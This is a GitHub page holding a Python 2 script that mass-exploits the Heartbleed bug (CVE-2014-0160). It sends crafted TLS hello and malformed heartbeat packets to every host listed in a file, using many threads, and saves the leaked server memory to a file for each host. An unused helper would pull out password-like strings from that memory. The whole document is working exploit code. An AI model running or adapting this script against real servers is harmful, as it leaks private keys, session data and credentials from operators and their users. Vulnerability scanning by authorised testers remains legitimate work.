forked from 0x90/CVE-2014-0160
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Heartbeat_scanner.py
executable file
·151 lines (116 loc) · 4.28 KB
/
Heartbeat_scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
import socket, ssl, pprint
import Queue
import threading,time,sys,select,struct,urllib,time,re,os
'''
16 03 02 00 31 # TLS Header
01 00 00 2d # Handshake header
03 02 # ClientHello field: version number (TLS 1.1)
50 0b af bb b7 5a b8 3e f0 ab 9a e3 f3 9c 63 15 \
33 41 37 ac fd 6c 18 1a 24 60 dc 49 67 c2 fd 96 # ClientHello field: random
00 # ClientHello field: session id
00 04 # ClientHello field: cipher suite length
00 33 c0 11 # ClientHello field: cipher suite(s)
01 # ClientHello field: compression support, length
00 # ClientHello field: compression support, no compression (0)
00 00 # ClientHello field: extension length (0)
'''
hello_packet = "16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex')
hb_packet = "1803020003014000".decode('hex')
def password_parse(the_response):
the_response_nl= the_response.split(' ')
#Interesting Paramaters found:
for each_item in the_response_nl:
if "=" in each_item or "password" in each_item:
print each_item
def recv_timeout(the_socket,timeout=2):
#make socket non blocking
the_socket.setblocking(0)
#total data partwise in an array
total_data=[];
data='';
#beginning time
begin=time.time()
while 1:
if total_data and time.time()-begin > timeout:
break
elif time.time()-begin > timeout*2:
break
try:
data = the_socket.recv(8192)
if data:
total_data.append(data)
#change the beginning time for measurement
begin=time.time()
else:
#sleep for sometime to indicate a gap
time.sleep(0.1)
except:
pass
return ''.join(total_data)
def tls(target_addr):
try:
server_port =443
target_addr = target_addr.strip()
if ":" in target_addr:
server_port = target_addr.split(":")[1]
target_addr = target_addr.split(":")[0]
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
print >>sys.stderr, '\n[+]Scanning server %s' % target_addr , "\n"
print "##############################################################"
sys.stdout.flush()
client_socket .connect((target_addr, int(server_port)))
#'Sending Hello request...'
client_socket.send(hello_packet)
recv_timeout(client_socket,3)
print 'Sending heartbeat request...'
client_socket.send(hb_packet)
data = recv_timeout(client_socket,3)
if len(data) > 7 :
print "[-] ",target_addr,' Vulnerable Server ...\n'
#print data
if os.path.exists(target_addr+".txt"):
file_write = open(target_addr+".txt", 'a+')
else:
file_write = file(target_addr+".txt", "w")
file_write.write(data)
else :
print "[-] ",target_addr,' Not Vulnerable ...'
except Exception as e:
print e,target_addr,server_port
class BinaryGrab(threading.Thread):
"""Threaded Url Grab"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
url = self.queue.get()
tls(url)
#Scan targets here
#signals to queue job is done
self.queue.task_done()
start = time.time()
def manyurls(server_addr):
querange = len(server_addr)
queue = Queue.Queue()
#spawn a pool of threads, and pass them queue instance
for i in range(int(querange)):
t = BinaryGrab(queue)
t.setDaemon(True)
t.start()
#populate queue with data
for target in server_addr:
queue.put(target)
#wait on the queue until everything has been processed
queue.join()
if __name__ == "__main__":
# Kepp all ur targets in scan.txt in the same folder.
server_addr = []
print "[+] cve-2014-0160 Mass Scanner by Rahul Sasi (fb1h2s)"
print "[+] Read More here http://www.garage4hackers.com/entry.php?b=2551"
read_f = open("scan.txt", "r")
server_addr = read_f.readlines()
#or provide names here
#server_addr = ['yahoo.com']
manyurls(server_addr)